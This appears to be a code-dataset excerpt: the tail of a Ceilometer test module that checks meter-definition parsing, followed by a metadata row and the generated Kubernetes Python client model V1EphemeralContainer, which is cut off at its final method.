project_id="$.payload.initiator.project_id",
lookup=["name", "unit", "volume"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
LOG.warning.assert_called_with('Only 0 fetched meters contain '
'"volume" field instead of 2.')
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_meter_payload_invalid_short(self, LOG):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][0]['result']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "unit", "volume"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
LOG.warning.assert_called_with('Only 1 fetched meters contain '
'"volume" field instead of 2.')
def test_arithmetic_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.percent',
event_type="compute.metrics.update",
type='gauge',
unit="percent",
volume="$.payload.metrics["
"?(@.name='cpu.percent')].value"
" * 100",
resource_id="$.payload.host + '_'"
" + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.percent', s1['name'])
self.assertEqual(2.7501485834103514, s1['volume'])
self.assertEqual("tianst_tianst.sh.intel.com",
s1['resource_id'])
def test_string_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="$.payload.host + '_'"
" + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual(1600, s1['volume'])
self.assertEqual("tianst_tianst.sh.intel.com",
s1['resource_id'])
def test_prefix_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="'prefix-' + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual(1600, s1['volume'])
self.assertEqual("prefix-tianst.sh.intel.com",
s1['resource_id'])
def test_duplicate_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
def test_multi_files_multi_meters(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
def test_multi_files_duplicate_meter(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(data))
self.assertEqual(data[0].as_dict()['name'], 'test')
def test_multi_files_empty_payload(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements']
cfg1 = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
cfg2 = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(event))
self.assertEqual(0, len(data))
def test_multi_files_unmatched_meter(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.update",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(data))
self.assertEqual(data[0].as_dict()['name'], 'test1')
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_files_bad_meter(self, LOG):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="bad_test",
type="bad_type",
event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
args, kwargs = LOG.error.call_args_list[0]
self.assertEqual("Error loading meter definition: %s", args[0])
self.assertTrue(args[1].endswith("Invalid type bad_type specified"))
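# Illustrative sketch (not part of the original test module): every test
# above builds its meter definitions inline with yaml.dump. Assuming the same
# schema, a standalone definition file fed through _load_meter_def_file would
# look like the snippet below; the field names are taken from the tests
# themselves, everything else is hypothetical.
#
# metric:
#   - name: "test1"
#     event_type: "test.create"
#     type: "delta"
#     unit: "B"
#     volume: "$.payload.volume"
#     resource_id: "$.payload.resource_id"
#     project_id: "$.payload.project_id"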
| 46.179054
| 79
| 0.503109
|
a39d9b4c1bcb7b3c0fa0fa584c2c3212087b0654
| 33,442
|
py
|
Python
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | 1
|
2022-02-22T23:10:55.000Z
|
2022-02-22T23:10:55.000Z
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | 6
|
2021-09-13T19:03:02.000Z
|
2022-03-16T18:56:42.000Z
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1EphemeralContainer(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'args': 'list[str]',
'command': 'list[str]',
'env': 'list[V1EnvVar]',
'env_from': 'list[V1EnvFromSource]',
'image': 'str',
'image_pull_policy': 'str',
'lifecycle': 'V1Lifecycle',
'liveness_probe': 'V1Probe',
'name': 'str',
'ports': 'list[V1ContainerPort]',
'readiness_probe': 'V1Probe',
'resources': 'V1ResourceRequirements',
'security_context': 'V1SecurityContext',
'startup_probe': 'V1Probe',
'stdin': 'bool',
'stdin_once': 'bool',
'target_container_name': 'str',
'termination_message_path': 'str',
'termination_message_policy': 'str',
'tty': 'bool',
'volume_devices': 'list[V1VolumeDevice]',
'volume_mounts': 'list[V1VolumeMount]',
'working_dir': 'str'
}
attribute_map = {
'args': 'args',
'command': 'command',
'env': 'env',
'env_from': 'envFrom',
'image': 'image',
'image_pull_policy': 'imagePullPolicy',
'lifecycle': 'lifecycle',
'liveness_probe': 'livenessProbe',
'name': 'name',
'ports': 'ports',
'readiness_probe': 'readinessProbe',
'resources': 'resources',
'security_context': 'securityContext',
'startup_probe': 'startupProbe',
'stdin': 'stdin',
'stdin_once': 'stdinOnce',
'target_container_name': 'targetContainerName',
'termination_message_path': 'terminationMessagePath',
'termination_message_policy': 'terminationMessagePolicy',
'tty': 'tty',
'volume_devices': 'volumeDevices',
'volume_mounts': 'volumeMounts',
'working_dir': 'workingDir'
}
def __init__(self, args=None, command=None, env=None, env_from=None, image=None, image_pull_policy=None, lifecycle=None, liveness_probe=None, name=None, ports=None, readiness_probe=None, resources=None, security_context=None, startup_probe=None, stdin=None, stdin_once=None, target_container_name=None, termination_message_path=None, termination_message_policy=None, tty=None, volume_devices=None, volume_mounts=None, working_dir=None, local_vars_configuration=None): # noqa: E501
"""V1EphemeralContainer - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._args = None
self._command = None
self._env = None
self._env_from = None
self._image = None
self._image_pull_policy = None
self._lifecycle = None
self._liveness_probe = None
self._name = None
self._ports = None
self._readiness_probe = None
self._resources = None
self._security_context = None
self._startup_probe = None
self._stdin = None
self._stdin_once = None
self._target_container_name = None
self._termination_message_path = None
self._termination_message_policy = None
self._tty = None
self._volume_devices = None
self._volume_mounts = None
self._working_dir = None
self.discriminator = None
if args is not None:
self.args = args
if command is not None:
self.command = command
if env is not None:
self.env = env
if env_from is not None:
self.env_from = env_from
if image is not None:
self.image = image
if image_pull_policy is not None:
self.image_pull_policy = image_pull_policy
if lifecycle is not None:
self.lifecycle = lifecycle
if liveness_probe is not None:
self.liveness_probe = liveness_probe
self.name = name
if ports is not None:
self.ports = ports
if readiness_probe is not None:
self.readiness_probe = readiness_probe
if resources is not None:
self.resources = resources
if security_context is not None:
self.security_context = security_context
if startup_probe is not None:
self.startup_probe = startup_probe
if stdin is not None:
self.stdin = stdin
if stdin_once is not None:
self.stdin_once = stdin_once
if target_container_name is not None:
self.target_container_name = target_container_name
if termination_message_path is not None:
self.termination_message_path = termination_message_path
if termination_message_policy is not None:
self.termination_message_policy = termination_message_policy
if tty is not None:
self.tty = tty
if volume_devices is not None:
self.volume_devices = volume_devices
if volume_mounts is not None:
self.volume_mounts = volume_mounts
if working_dir is not None:
self.working_dir = working_dir
@property
def args(self):
"""Gets the args of this V1EphemeralContainer. # noqa: E501
Arguments to the entrypoint. The docker image's CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:return: The args of this V1EphemeralContainer. # noqa: E501
:rtype: list[str]
"""
return self._args
@args.setter
def args(self, args):
"""Sets the args of this V1EphemeralContainer.
Arguments to the entrypoint. The docker image's CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:param args: The args of this V1EphemeralContainer. # noqa: E501
:type: list[str]
"""
self._args = args
@property
def command(self):
"""Gets the command of this V1EphemeralContainer. # noqa: E501
Entrypoint array. Not executed within a shell. The docker image's ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:return: The command of this V1EphemeralContainer. # noqa: E501
:rtype: list[str]
"""
return self._command
@command.setter
def command(self, command):
"""Sets the command of this V1EphemeralContainer.
Entrypoint array. Not executed within a shell. The docker image's ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:param command: The command of this V1EphemeralContainer. # noqa: E501
:type: list[str]
"""
self._command = command
@property
def env(self):
"""Gets the env of this V1EphemeralContainer. # noqa: E501
List of environment variables to set in the container. Cannot be updated. # noqa: E501
:return: The env of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1EnvVar]
"""
return self._env
@env.setter
def env(self, env):
"""Sets the env of this V1EphemeralContainer.
List of environment variables to set in the container. Cannot be updated. # noqa: E501
:param env: The env of this V1EphemeralContainer. # noqa: E501
:type: list[V1EnvVar]
"""
self._env = env
@property
def env_from(self):
"""Gets the env_from of this V1EphemeralContainer. # noqa: E501
List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. # noqa: E501
:return: The env_from of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1EnvFromSource]
"""
return self._env_from
@env_from.setter
def env_from(self, env_from):
"""Sets the env_from of this V1EphemeralContainer.
List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. # noqa: E501
:param env_from: The env_from of this V1EphemeralContainer. # noqa: E501
:type: list[V1EnvFromSource]
"""
self._env_from = env_from
@property
def image(self):
"""Gets the image of this V1EphemeralContainer. # noqa: E501
Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images # noqa: E501
:return: The image of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._image
@image.setter
def image(self, image):
"""Sets the image of this V1EphemeralContainer.
Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images # noqa: E501
:param image: The image of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._image = image
@property
def image_pull_policy(self):
"""Gets the image_pull_policy of this V1EphemeralContainer. # noqa: E501
Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images Possible enum values: - `\"Always\"` means that kubelet always attempts to pull the latest image. Container will fail If the pull fails. - `\"IfNotPresent\"` means that kubelet pulls if the image isn't present on disk. Container will fail if the image isn't present and the pull fails. - `\"Never\"` means that kubelet never pulls an image, but only uses a local image. Container will fail if the image isn't present # noqa: E501
:return: The image_pull_policy of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._image_pull_policy
@image_pull_policy.setter
def image_pull_policy(self, image_pull_policy):
"""Sets the image_pull_policy of this V1EphemeralContainer.
Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images Possible enum values: - `\"Always\"` means that kubelet always attempts to pull the latest image. Container will fail If the pull fails. - `\"IfNotPresent\"` means that kubelet pulls if the image isn't present on disk. Container will fail if the image isn't present and the pull fails. - `\"Never\"` means that kubelet never pulls an image, but only uses a local image. Container will fail if the image isn't present # noqa: E501
:param image_pull_policy: The image_pull_policy of this V1EphemeralContainer. # noqa: E501
:type: str
"""
allowed_values = ["Always", "IfNotPresent", "Never"] # noqa: E501
if self.local_vars_configuration.client_side_validation and image_pull_policy not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `image_pull_policy` ({0}), must be one of {1}" # noqa: E501
.format(image_pull_policy, allowed_values)
)
self._image_pull_policy = image_pull_policy
@property
def lifecycle(self):
"""Gets the lifecycle of this V1EphemeralContainer. # noqa: E501
:return: The lifecycle of this V1EphemeralContainer. # noqa: E501
:rtype: V1Lifecycle
"""
return self._lifecycle
@lifecycle.setter
def lifecycle(self, lifecycle):
"""Sets the lifecycle of this V1EphemeralContainer.
:param lifecycle: The lifecycle of this V1EphemeralContainer. # noqa: E501
:type: V1Lifecycle
"""
self._lifecycle = lifecycle
@property
def liveness_probe(self):
"""Gets the liveness_probe of this V1EphemeralContainer. # noqa: E501
:return: The liveness_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._liveness_probe
@liveness_probe.setter
def liveness_probe(self, liveness_probe):
"""Sets the liveness_probe of this V1EphemeralContainer.
:param liveness_probe: The liveness_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._liveness_probe = liveness_probe
@property
def name(self):
"""Gets the name of this V1EphemeralContainer. # noqa: E501
Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. # noqa: E501
:return: The name of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this V1EphemeralContainer.
Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. # noqa: E501
:param name: The name of this V1EphemeralContainer. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def ports(self):
"""Gets the ports of this V1EphemeralContainer. # noqa: E501
Ports are not allowed for ephemeral containers. # noqa: E501
:return: The ports of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1ContainerPort]
"""
return self._ports
@ports.setter
def ports(self, ports):
"""Sets the ports of this V1EphemeralContainer.
Ports are not allowed for ephemeral containers. # noqa: E501
:param ports: The ports of this V1EphemeralContainer. # noqa: E501
:type: list[V1ContainerPort]
"""
self._ports = ports
@property
def readiness_probe(self):
"""Gets the readiness_probe of this V1EphemeralContainer. # noqa: E501
:return: The readiness_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._readiness_probe
@readiness_probe.setter
def readiness_probe(self, readiness_probe):
"""Sets the readiness_probe of this V1EphemeralContainer.
:param readiness_probe: The readiness_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._readiness_probe = readiness_probe
@property
def resources(self):
"""Gets the resources of this V1EphemeralContainer. # noqa: E501
:return: The resources of this V1EphemeralContainer. # noqa: E501
:rtype: V1ResourceRequirements
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this V1EphemeralContainer.
:param resources: The resources of this V1EphemeralContainer. # noqa: E501
:type: V1ResourceRequirements
"""
self._resources = resources
@property
def security_context(self):
"""Gets the security_context of this V1EphemeralContainer. # noqa: E501
:return: The security_context of this V1EphemeralContainer. # noqa: E501
:rtype: V1SecurityContext
"""
return self._security_context
@security_context.setter
def security_context(self, security_context):
"""Sets the security_context of this V1EphemeralContainer.
:param security_context: The security_context of this V1EphemeralContainer. # noqa: E501
:type: V1SecurityContext
"""
self._security_context = security_context
@property
def startup_probe(self):
"""Gets the startup_probe of this V1EphemeralContainer. # noqa: E501
:return: The startup_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._startup_probe
@startup_probe.setter
def startup_probe(self, startup_probe):
"""Sets the startup_probe of this V1EphemeralContainer.
:param startup_probe: The startup_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._startup_probe = startup_probe
@property
def stdin(self):
"""Gets the stdin of this V1EphemeralContainer. # noqa: E501
Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. # noqa: E501
:return: The stdin of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._stdin
@stdin.setter
def stdin(self, stdin):
"""Sets the stdin of this V1EphemeralContainer.
Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. # noqa: E501
:param stdin: The stdin of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._stdin = stdin
@property
def stdin_once(self):
"""Gets the stdin_once of this V1EphemeralContainer. # noqa: E501
Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false # noqa: E501
:return: The stdin_once of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._stdin_once
@stdin_once.setter
def stdin_once(self, stdin_once):
"""Sets the stdin_once of this V1EphemeralContainer.
Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false # noqa: E501
:param stdin_once: The stdin_once of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._stdin_once = stdin_once
@property
def target_container_name(self):
"""Gets the target_container_name of this V1EphemeralContainer. # noqa: E501
If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container uses the namespaces configured in the Pod spec. The container runtime must implement support for this feature. If the runtime does not support namespace targeting then the result of setting this field is undefined. # noqa: E501
:return: The target_container_name of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._target_container_name
@target_container_name.setter
def target_container_name(self, target_container_name):
"""Sets the target_container_name of this V1EphemeralContainer.
If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container uses the namespaces configured in the Pod spec. The container runtime must implement support for this feature. If the runtime does not support namespace targeting then the result of setting this field is undefined. # noqa: E501
:param target_container_name: The target_container_name of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._target_container_name = target_container_name
@property
def termination_message_path(self):
"""Gets the termination_message_path of this V1EphemeralContainer. # noqa: E501
Optional: Path at which the file to which the container's termination message will be written is mounted into the container's filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated. # noqa: E501
:return: The termination_message_path of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._termination_message_path
@termination_message_path.setter
def termination_message_path(self, termination_message_path):
"""Sets the termination_message_path of this V1EphemeralContainer.
Optional: Path at which the file to which the container's termination message will be written is mounted into the container's filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated. # noqa: E501
:param termination_message_path: The termination_message_path of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._termination_message_path = termination_message_path
@property
def termination_message_policy(self):
"""Gets the termination_message_policy of this V1EphemeralContainer. # noqa: E501
Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. Possible enum values: - `\"FallbackToLogsOnError\"` will read the most recent contents of the container logs for the container status message when the container exits with an error and the terminationMessagePath has no contents. - `\"File\"` is the default behavior and will set the container status message to the contents of the container's terminationMessagePath when the container exits. # noqa: E501
:return: The termination_message_policy of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._termination_message_policy
@termination_message_policy.setter
def termination_message_policy(self, termination_message_policy):
"""Sets the termination_message_policy of this V1EphemeralContainer.
Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. Possible enum values: - `\"FallbackToLogsOnError\"` will read the most recent contents of the container logs for the container status message when the container exits with an error and the terminationMessagePath has no contents. - `\"File\"` is the default behavior and will set the container status message to the contents of the container's terminationMessagePath when the container exits. # noqa: E501
:param termination_message_policy: The termination_message_policy of this V1EphemeralContainer. # noqa: E501
:type: str
"""
allowed_values = ["FallbackToLogsOnError", "File"] # noqa: E501
if self.local_vars_configuration.client_side_validation and termination_message_policy not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `termination_message_policy` ({0}), must be one of {1}" # noqa: E501
.format(termination_message_policy, allowed_values)
)
self._termination_message_policy = termination_message_policy
@property
def tty(self):
"""Gets the tty of this V1EphemeralContainer. # noqa: E501
Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. # noqa: E501
:return: The tty of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._tty
@tty.setter
def tty(self, tty):
"""Sets the tty of this V1EphemeralContainer.
Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. # noqa: E501
:param tty: The tty of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._tty = tty
@property
def volume_devices(self):
"""Gets the volume_devices of this V1EphemeralContainer. # noqa: E501
volumeDevices is the list of block devices to be used by the container. # noqa: E501
:return: The volume_devices of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1VolumeDevice]
"""
return self._volume_devices
@volume_devices.setter
def volume_devices(self, volume_devices):
"""Sets the volume_devices of this V1EphemeralContainer.
volumeDevices is the list of block devices to be used by the container. # noqa: E501
:param volume_devices: The volume_devices of this V1EphemeralContainer. # noqa: E501
:type: list[V1VolumeDevice]
"""
self._volume_devices = volume_devices
@property
def volume_mounts(self):
"""Gets the volume_mounts of this V1EphemeralContainer. # noqa: E501
Pod volumes to mount into the container's filesystem. Subpath mounts are not allowed for ephemeral containers. Cannot be updated. # noqa: E501
:return: The volume_mounts of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1VolumeMount]
"""
return self._volume_mounts
@volume_mounts.setter
def volume_mounts(self, volume_mounts):
"""Sets the volume_mounts of this V1EphemeralContainer.
Pod volumes to mount into the container's filesystem. Subpath mounts are not allowed for ephemeral containers. Cannot be updated. # noqa: E501
:param volume_mounts: The volume_mounts of this V1EphemeralContainer. # noqa: E501
:type: list[V1VolumeMount]
"""
self._volume_mounts = volume_mounts
@property
def working_dir(self):
"""Gets the working_dir of this V1EphemeralContainer. # noqa: E501
Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. # noqa: E501
:return: The working_dir of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._working_dir
@working_dir.setter
def working_dir(self, working_dir):
"""Sets the working_dir of this V1EphemeralContainer.
Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. # noqa: E501
:param working_dir: The working_dir of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._working_dir = working_dir
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1EphemeralContainer):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
